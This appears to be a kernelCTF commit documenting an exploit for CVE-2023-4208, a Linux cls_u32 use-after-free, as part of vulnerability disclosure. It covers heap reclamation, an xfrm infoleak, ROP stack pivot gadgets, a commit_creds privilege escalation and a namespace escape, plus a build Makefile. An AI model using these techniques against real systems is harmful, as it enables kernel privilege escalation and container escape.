Commit c31b163

kernelCTF: Add CVE-2023-4208_lts_cos_mitigation_2
1 parent aab489f commit c31b163

18 files changed

+3017
-0
lines changed

@@ -0,0 +1,173 @@
1+
## Setup
2+
3+
First, we create a root qdisc of the DRR type.
4+
Any classful qdisc can be used, but this choice affects the sizes of the objects involved in the exploitation.
5+
6+
Next, we create two child classes: 0x10001 and 0x10002.
7+
8+
We also add two u32 filters attached to the root qdisc:
9+
- handle 0x80000001, bound to the 0x10001 class, with selector value 0x1234 and mask 0xffff - this will prevent this filter from ever matching.
10+
- handle 0x80000002, bound to the 0x10001 class, with selector value 0 and mask 0 - this will cause this filter to match on any packet.
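The effect of the two selectors can be illustrated with a minimal model of a single u32 key comparison. This is a sketch rather than the kernel code: `u32_key_matches` is a hypothetical helper, and it assumes a key matches when the packet word equals the key value under the mask.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical model of one u32 key test: the key matches when the packet
 * word and the key value agree on every bit selected by the mask. */
bool u32_key_matches(uint32_t packet_word, uint32_t mask, uint32_t val)
{
    return ((packet_word ^ val) & mask) == 0;
}
```

With value 0 and mask 0 no bits are compared, so every packet matches. With value 0x1234 and mask 0xffff the key matches only words whose low 16 bits are 0x1234, which is presumably never the case for the packets this exploit sends.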
11+
12+
## Triggering use-after-free
13+
14+
To trigger the vulnerability, [scenario 2](vulnerability.md#scenario-2) is used.
15+
16+
We change the bound class of the first filter (handle 0x80000001) to class 0x10002.
17+
This causes the filter_cnt field of class 0x10001 to become 0, allowing us to delete the class even though the second filter (handle 0x80000002) is still bound to it.
18+
19+
## Getting RIP control
20+
21+
Deleting a DRR class frees two objects:
22+
- struct drr_class, freed directly by kfree() in drr_destroy_class
23+
- struct qdisc, scheduled to be freed through RCU in __qdisc_destroy()
24+
25+
26+
### LTS/COS exploit
27+
28+
The simplest way to get code execution is to target ->enqueue() function pointer of the qdisc struct:
29+
```
struct qdisc {
	int (*enqueue)(struct sk_buff *, struct qdisc *, struct sk_buff * *); /* 0 0x8 */
	struct sk_buff * (*dequeue)(struct qdisc *); /* 0x8 0x8 */
	...
```
35+
36+
->enqueue() is called from dev_qdisc_enqueue() after a packet is classified to a given class by u32_classify().
37+
38+
Struct qdisc is allocated from kmalloc-512, so we need a heap allocation primitive that allocates from that cache and gives us control of the first 8 bytes of the object. This excludes some popular options like keys and xattrs.
39+
40+
In this exploit we used a netlink allocation primitive (other socket kinds can be used as well). When a message is sent on a netlink socket, the kernel allocates a buffer for the data in __alloc_skb() through the kmalloc_reserve() wrapper, which for the sizes we are interested in uses a regular general-purpose kmalloc cache.
41+
User data is copied at the very beginning of this buffer, with skb metadata (skb_shared_info) added at the end.
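The cache that such a buffer lands in can be estimated with a small helper. The sketch below is only an approximation under stated assumptions: the list of general-purpose cache sizes, a 320-byte `skb_shared_info`, and payload rounding to 64 bytes are typical for x86_64 builds but are not taken from the exploit. The names `kmalloc_bucket`, `skb_data_bucket` and `ASSUMED_SHINFO_SIZE` are hypothetical.

```c
#include <stddef.h>

/* General-purpose kmalloc cache sizes on a typical x86_64 build (assumption). */
static const size_t kmalloc_sizes[] = {
    8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
};

/* Return the size of the smallest cache that fits n bytes, or 0 if none fits. */
size_t kmalloc_bucket(size_t n)
{
    for (size_t i = 0; i < sizeof(kmalloc_sizes) / sizeof(kmalloc_sizes[0]); i++)
        if (n <= kmalloc_sizes[i])
            return kmalloc_sizes[i];
    return 0;
}

/* Assumed sizeof(struct skb_shared_info); the real value depends on the build. */
#define ASSUMED_SHINFO_SIZE 320u

/* Cache used for the skb data buffer of a message carrying payload_len bytes,
 * assuming the buffer holds the payload rounded up to 64 bytes followed by
 * the shared info. */
size_t skb_data_bucket(size_t payload_len)
{
    size_t aligned = (payload_len + 63) & ~(size_t)63;
    return kmalloc_bucket(aligned + ASSUMED_SHINFO_SIZE);
}
```

Under these assumptions any payload of up to 192 bytes ends up in kmalloc-512, while larger payloads move to kmalloc-1024.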
42+
43+
One last thing to remember is that we have to sleep for a bit to give RCU time to perform the callback that will free the qdisc object.
44+
45+
Once the contents of the qdisc object are under our control, we just have to send any packet to get RIP control.
46+
47+
In this exploit we rely on the external KASLR leak, so the kernel text address is known beforehand.
48+
49+
50+
### Mitigation exploit
51+
52+
When I was writing the original mitigation exploit, I incorrectly assumed that targeting the qdisc object wouldn't work on the mitigation instance because of the static/dynamic kmalloc cache split.
53+
Looking back at this now, I see that the original exploit for LTS would work perfectly fine on mitigation (after adjusting offsets etc) because qdisc is allocated from dynamic cache due to its size being calculated at runtime in qdisc_alloc().
54+
55+
I'll document this unnecessarily complicated approach here anyways in case someone finds it interesting.
56+
57+
The mitigation exploit targets the other object freed when the class is deleted - struct drr_class.
58+
This object has a qdisc pointer at offset 0x60. If we manage to overwrite it with a pointer to a fake qdisc object, we can gain code execution in a similar way to the LTS exploit.
59+
60+
There are two issues to overcome with this approach:
61+
- drr_class is a fixed-size allocation, so with CONFIG_KMALLOC_SPLIT_VARSIZE enabled we have to find an object allocated from kmalloc-128 that has fixed size and has user-controlled data at offset 0x60
62+
- We have to have a place with a known address to store the fake qdisc object
63+
64+
The first issue is solved by struct clusterip_config, which has the following field at the end:
65+
```
struct clusterip_config {
	...
	char ifname[16]; /* 0x60 0x10 */
};
```
73+
74+
This object is allocated when creating an iptables rule with the CLUSTERIP target.
75+
The network interface provided in the ifname field has to exist, but this is not a problem because we can rename the loopback interface to any name we want.
76+
The only restriction is that we can't use null or whitespace bytes.
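Whether a given pointer can be smuggled through the interface name can be checked up front. The following is a minimal sketch with hypothetical helper names (`ptr_to_ifname`, `ptr_usable_as_ifname`), assuming a little-endian host. It checks only the two restrictions named above; the kernel's own name validation may reject further characters.

```c
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

/* Copy the 8 bytes of a 64-bit pointer (little-endian host assumed) into a
 * zero-filled name buffer, the way it would sit in ifname[16]. */
void ptr_to_ifname(uint64_t ptr, char name[16])
{
    memset(name, 0, 16);
    memcpy(name, &ptr, sizeof(ptr));
}

/* Check only the restrictions named in the text: none of the 8 pointer bytes
 * may be a null byte or an ASCII whitespace byte. */
bool ptr_usable_as_ifname(uint64_t ptr)
{
    for (int i = 0; i < 8; i++) {
        unsigned char b = (unsigned char)(ptr >> (8 * i));
        if (b == 0x00 || b == ' ' || (b >= '\t' && b <= '\r'))
            return false;
    }
    return true;
}
```

Under this check a pointer whose low byte is 0x20 (a space) is rejected, so the address chosen for the fake object has to be picked with these byte values in mind.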
77+
78+
The issue with placing the payload at a known address was solved by exploiting a separate infoleak vulnerability in the xfrm subsystem:
79+
80+
```
author Herbert Xu 2023-02-09 09:09:52 +0800
committer Steffen Klassert 2023-02-13 13:38:58 +0100
commit 8222d5910dae08213b6d9d4bc9a7f8502855e624

xfrm: Zero padding when dumping algos and encap
```
87+
88+
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8222d5910dae08213b6d9d4bc9a7f8502855e624
89+
90+
This vulnerability allows us to leak 64 bytes of uninitialized data from the xfrm_algo object allocated from the kmalloc-96 cache.
91+
We'll use it to leak data of a simple_xattr object, which looks like this:
92+
```
struct simple_xattr {
	struct list_head list; /* 0 0x10 */
	char * name; /* 0x10 0x8 */
	size_t size; /* 0x18 0x8 */
	char value[]; /* 0x20 0 */
};
```
101+
102+
Here's a procedure to get our data at a known address:
103+
104+
1. Create xattr x1 with data length of 96, but name length of 256 bytes so that simple_xattr is allocated from kmalloc-96, but name from kmalloc-256.
105+
2. Remove x1 and allocate xfrm_algo in place of its simple_xattr.
106+
3. Read x1->name pointer using infoleak.
107+
4. Create a new xattr x2 with data length placing it into kmalloc-256. This will be allocated in place of the x1's name buffer that was freed when x1 was removed. We now have controlled data at the address we leaked + 0x20 (simple_xattr header takes 0x20 bytes).
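The address arithmetic in step 4 follows directly from the structure layout. The sketch below mirrors that layout in userspace to make the 0x20 offset explicit. The `*_mirror` types and `controlled_data_addr` are hypothetical names, and the sketch assumes 64-bit pointers and that x2 reuses the freed name buffer exactly.

```c
#include <stddef.h>
#include <stdint.h>

/* Userspace mirror of the layout shown above (64-bit pointers assumed). */
struct list_head_mirror {
    uint64_t next;
    uint64_t prev;
};

struct simple_xattr_mirror {
    struct list_head_mirror list; /* 0x00 */
    uint64_t name;                /* 0x10: the pointer leaked in step 3 */
    uint64_t size;                /* 0x18 */
    char value[];                 /* 0x20: user-controlled data */
};

/* Address of x2's value bytes, given the leaked x1->name pointer. */
uint64_t controlled_data_addr(uint64_t leaked_name_ptr)
{
    return leaked_name_ptr + offsetof(struct simple_xattr_mirror, value);
}
```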
108+
109+
The next step is to rename the loopback interface so that its name consists of the bytes of the pointer to our fake qdisc object stored in x2.
110+
After this is done, we trigger the use-after-free in the same way as with LTS exploit and create an iptables CLUSTERIP rule with input interface set to the fake qdisc's address.
111+
This overwrites struct drr_class with struct clusterip_config, setting qdisc pointer of the former to the address of our fake object.
112+
113+
Finally, we send a network packet to be matched by u32_classify() leading to the ->enqueue function pointer of our fake qdisc being called.
114+
115+
## Pivot to ROP
116+
117+
When ->enqueue() is called, the registers are as follows:
118+
- RDI - pointer to the skb
119+
- RSI - pointer to the qdisc
120+
- RAX - copy of the RSI
121+
122+
RDI is not that useful to us, but RSI and RAX point directly to the data under our control.
123+
124+
Stack pivot has three stages using different gadgets.
125+
126+
#### Gadget 1
127+
128+
```
lea rdi, [rax + 0x20]
mov rax, qword ptr [rax + 0x30]
jmp __x86_indirect_thunk_rax
```
133+
134+
This adds 0x20 to our controlled data pointer, stores it into RDI and jumps to the next gadget.
135+
Adding 0x20 is very helpful, because we can't use the very beginning of the buffer as the start of the ROP - it contains the address of our first gadget.
136+
137+
#### Gadget 2
138+
139+
```
push rdi
jmp qword [rsi+0x0F]
```
143+
144+
This pushes the location of our ROP chain onto the stack and jumps to the next gadget.
145+
146+
#### Gadget 3
147+
148+
```
pop rsp
ret
```
152+
153+
Finally, we pop the previously pushed ROP location into RSP, completing the pivot.
154+
155+
The gadgets above are from the LTS exploit. The COS and mitigation versions work exactly the same way; they differ only in the registers used and the offsets.
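The offsets used by the three gadgets fix where each address has to sit in the fake qdisc buffer. The following sketch lays them out; `place_pivot_gadgets` and the `OFF_*` names are hypothetical, and the gadget addresses are supplied by the caller rather than taken from any real kernel image.

```c
#include <stdint.h>
#include <string.h>

/* Offsets derived from the three gadgets above. */
#define OFF_GADGET1   0x00 /* ->enqueue slot, called first */
#define OFF_GADGET3   0x0f /* read by "jmp qword [rsi+0x0F]" (unaligned) */
#define OFF_ROP_START 0x20 /* "lea rdi, [rax + 0x20]": new stack pointer */
#define OFF_GADGET2   0x30 /* read by "mov rax, qword ptr [rax + 0x30]" */

/* Write the three pivot gadget addresses into a fake qdisc buffer of at
 * least 0x38 bytes. memcpy() is used because offset 0x0f is not aligned. */
void place_pivot_gadgets(uint8_t *buf, uint64_t g1, uint64_t g2, uint64_t g3)
{
    memcpy(buf + OFF_GADGET1, &g1, sizeof(g1));
    memcpy(buf + OFF_GADGET3, &g3, sizeof(g3));
    /* This slot lies inside the region starting at OFF_ROP_START, so a chain
     * placed there has to step over it. */
    memcpy(buf + OFF_GADGET2, &g2, sizeof(g2));
}
```

Note that the slot at 0x30 falls two entries into the ROP region that starts at 0x20, so the first entries of the chain have to skip it. How the exploit does this is not described here.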
156+
157+
## Second pivot
158+
159+
At this point we have full ROP, but there is not much space - most of our buffer is taken by skb_shared_info struct at the end.
160+
To have enough space to execute all privilege escalation code we have to pivot again.
161+
This is quite simple - we choose an unused read/write area in the kernel and use copy_user_generic_string() to copy the second stage ROP from userspace to that area.
162+
Then we use `pop rsp ; ret` gadget to pivot there.
163+
164+
## Privilege escalation
165+
166+
To escalate our process's privileges we execute the following functions from the ROP chain:
167+
168+
- commit_creds(init_cred)
169+
- switch_task_namespaces(find_task_by_vpid(1), init_nsproxy)
170+
171+
Then we set up registers for return to the userspace and jump to the `swapgs ; sysret` gadget in return_via_sysret.
172+
173+
After getting back to userspace we call setns() on namespaces of pid 1 to complete escape to the initial namespace.
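The final userspace step can be sketched as follows. This is a hedged illustration, not the exploit's code: `join_namespace` and `join_init_namespaces` are hypothetical helpers, the choice of the mount, PID and network namespaces is an assumption, and setns(2) is invoked through `syscall()` only so that the sketch does not depend on feature-test macros.

```c
#include <fcntl.h>
#include <stddef.h>
#include <sys/syscall.h>
#include <unistd.h>

/* Join the namespace referred to by path, e.g. "/proc/1/ns/mnt".
 * Returns 0 on success and -1 on failure. */
int join_namespace(const char *path)
{
    int fd = open(path, O_RDONLY);
    if (fd < 0)
        return -1;

    /* setns(fd, 0): a type of 0 accepts any kind of namespace. */
    long ret = syscall(SYS_setns, fd, 0);
    close(fd);
    return ret == 0 ? 0 : -1;
}

/* Join several namespaces of pid 1; which ones are needed is an assumption. */
int join_init_namespaces(void)
{
    static const char *const paths[] = {
        "/proc/1/ns/mnt", "/proc/1/ns/pid", "/proc/1/ns/net",
    };

    for (size_t i = 0; i < sizeof(paths) / sizeof(paths[0]); i++)
        if (join_namespace(paths[i]) != 0)
            return -1;
    return 0;
}
```

These calls only succeed once the process holds the required capabilities in the initial user namespace, which is what the ROP chain arranges.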
@@ -0,0 +1,134 @@
1+
## Requirements to trigger the vulnerability
2+
3+
- CAP_NET_ADMIN in a namespace is required
4+
- Kernel configuration: CONFIG_NET_CLS_U32
5+
- User namespaces required: Yes
6+
7+
## Commit which introduced the vulnerability
8+
9+
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=de5df63228fcfbd5bb7fd883774c18fec9e61f12
10+
11+
## Commit which fixed the vulnerability
12+
13+
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3044b16e7c6fe5d24b1cdbcf1bd0a9d92d1ebd81
14+
15+
## Affected kernel versions
16+
17+
Introduced in 3.18. Fixed in 6.5, 6.1.44, 5.15.125 and other stable trees.
18+
19+
## Affected component, subsystem
20+
21+
net/sched: cls_u32
22+
23+
## Description
24+
25+
When u32_change() is called on an existing filter, the new object is allocated using u32_init_knode() and then u32_set_parms() is called on it:
26+
```
...
	new = u32_init_knode(net, tp, n);
	if (!new)
		return -ENOMEM;

	err = u32_set_parms(net, tp, base, new, tb,
			    tca[TCA_RATE], flags, new->flags,
			    extack);
...
```
37+
38+
u32_init_knode() copies data from the existing "n" filter, including the .res pointer:
39+
40+
```
static struct tc_u_knode *u32_init_knode(struct net *net, struct tcf_proto *tp,
					 struct tc_u_knode *n)
{
...
	new = kzalloc(struct_size(new, sel.keys, s->nkeys), GFP_KERNEL);
	if (!new)
		return NULL;

...
[1]	new->res = n->res;
```
52+
53+
54+
The copied data includes a "res" field which is a tcf_result structure containing a pointer to the target class of a given filter.
55+
56+
u32_set_parms() calls tcf_bind_filter() if TCA_U32_CLASSID is set:
57+
```
	if (tb[TCA_U32_CLASSID]) {
		n->res.classid = nla_get_u32(tb[TCA_U32_CLASSID]);
[2]		tcf_bind_filter(tp, &n->res, base);
	}
```
63+
64+
65+
66+
tcf_bind_filter() calls .bind_tcf handler on the target class, but if n->res.class was already set it also calls .unbind_tcf on it:
67+
68+
```
static inline void
__tcf_bind_filter(struct Qdisc *q, struct tcf_result *r, unsigned long base)
{
	unsigned long cl;

	cl = q->ops->cl_ops->bind_tcf(q, base, r->classid);
	cl = __cls_set_class(&r->class, cl);
	if (cl)
[3]		q->ops->cl_ops->unbind_tcf(q, cl);
}
```
80+
81+
82+
For most classful qdiscs, .bind_tcf/.unbind_tcf just increase/decrease the filter_cnt counter, which protects the class against being destroyed while filters are bound to it, e.g.:
83+
```
static void drr_unbind_tcf(struct Qdisc *sch, unsigned long arg)
{
	struct drr_class *cl = (struct drr_class *)arg;

	cl->filter_cnt--;
}

static int drr_delete_class(struct Qdisc *sch, unsigned long arg,
			    struct netlink_ext_ack *extack)
{
	struct drr_sched *q = qdisc_priv(sch);
	struct drr_class *cl = (struct drr_class *)arg;

	if (cl->filter_cnt > 0)
		return -EBUSY;
...
```
101+
102+
Finally, when the change of the existing filter is successful, tcf_unbind_filter() is called on the old filter in u32_change():
103+
```
...
	u32_replace_knode(tp, tp_c, new);
[4]	tcf_unbind_filter(tp, &n->res);
	tcf_exts_get_net(&n->exts);
	tcf_queue_work(&n->rwork, u32_delete_key_work);
	return 0;
...
```
112+
113+
114+
115+
116+
This leads to a use-after-free (dangling res.class pointer) in two scenarios:
117+
118+
#### Scenario 1
119+
120+
u32_change() is called on the filter with an already bound target class "c1" and there is no TCA_U32_CLASSID in the new parameters.
121+
tcf_unbind_filter() is called on the old filter in [4].
122+
filter_cnt of the class "c1" is decreased and it becomes possible to delete the class. However, the pointer to class "c1" was copied to the new filter in [1] and is still set in the new version of the filter.
124+
125+
126+
#### Scenario 2
127+
128+
u32_change() is called on the filter with an already bound target class "c1", and there is a TCA_U32_CLASSID in the new parameters, but it is set to a different class "c2".
129+
Class "c1" is also bound to another filter "f2", so its filter_cnt is 2 at the start.
130+
131+
tcf_bind_filter() is called in [2] leading to the unbind_tcf call [3] on the "c1" class. filter_cnt of "c1" is now 1.
132+
Finally, tcf_unbind_filter() is called in [4] leading to the second unbind_tcf on the "c1" class.
133+
This sets the filter_cnt of the "c1" to 0, allowing it to be destroyed, but it is still bound to the "f2" filter.
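The counter arithmetic of both scenarios can be replayed with a small userspace model. This is a simplified sketch, not kernel code: all `model_*` names are hypothetical, and the model keeps only the class pointer and the bind counter. The bracketed numbers in the comments refer to the markers in the kernel snippets above.

```c
#include <stddef.h>

/* Simplified model: a class with a bind counter and a filter that remembers
 * the class it is bound to. */
struct model_class  { int filter_cnt; };
struct model_filter { struct model_class *cls; };

/* Bind f to c; if f pointed at another class before, unbind that one. */
void model_bind(struct model_filter *f, struct model_class *c)
{
    struct model_class *old = f->cls;

    c->filter_cnt++;       /* .bind_tcf on the target class */
    f->cls = c;
    if (old)
        old->filter_cnt--; /* [3] .unbind_tcf on the previous class */
}

void model_unbind(struct model_filter *f)
{
    if (f->cls) {
        f->cls->filter_cnt--;
        f->cls = NULL;
    }
}

/* Model of the vulnerable u32_change() path on an existing filter.
 * new_cls == NULL stands for "no TCA_U32_CLASSID in the new parameters". */
void model_change(struct model_filter *old, struct model_filter *fnew,
                  struct model_class *new_cls)
{
    fnew->cls = old->cls;          /* [1] res copied from the old filter */
    if (new_cls)
        model_bind(fnew, new_cls); /* [2] */
    model_unbind(old);             /* [4] */
}
```

Calling `model_change()` with `new_cls == NULL` reproduces scenario 1: the counter of "c1" drops to 0 while the new filter still points to it. Calling it with a second class while another filter is bound to "c1" reproduces scenario 2: "c1" is decremented twice, once in [3] and once in [4].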
134+
@@ -0,0 +1,9 @@
INCLUDES = -I/usr/include/libiptc -I/usr/include/libnl3
LIBS = -L. -pthread -lip4tc -lnl-cli-3 -lnl-route-3 -lnl-3 -ldl
CFLAGS = -fomit-frame-pointer -static

exploit: exploit.c libip4tc.a
	gcc -o $@ exploit.c $(INCLUDES) $(CFLAGS) $(LIBS)

prerequisites:
	sudo apt-get install libnl-cli-3-dev libnl-route-3-dev libip4tc-dev
